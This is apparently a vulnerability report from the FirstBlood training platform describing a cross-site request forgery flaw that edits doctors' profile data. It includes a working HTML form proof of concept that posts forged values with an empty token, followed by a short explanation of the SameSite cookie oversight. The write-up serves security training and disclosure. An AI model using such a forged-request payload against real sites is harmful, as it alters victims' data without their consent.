FirstBlood-#1014CSRF to edit doctors information
This issue was discovered on FirstBlood v3



On 2022-12-08, properlay Level 7 reported:

Hello, I found CSRF vulnerability to edit doctors information.

To reproduce:

  1. Login your doctor administrator account.

  2. Copy and paste below code in an html file.

<html>
    <body>
        <form method="POST" action="https://cbad703fc8c6-properlay.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php">
            <input type="hidden" name="drid" value="1"/>
            <input type="hidden" name="name" value="attacke"/>
            <input type="hidden" name="bio" value="attacker"/>
            <input type="hidden" name="bookable" value="1"/>
            <input type="hidden" name="csrf" value=""/>
            <input type="submit" value="Submit">
        </form>
    </body>
<html>
  1. Open it in a browser, you will see doctor Julie's information change.

Impact:

Can edit doctors information from csrf.

P4 Low


FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.

Report Feedback

@zseano

Creator & Administrator


Congratulations you were the third researcher to discover this!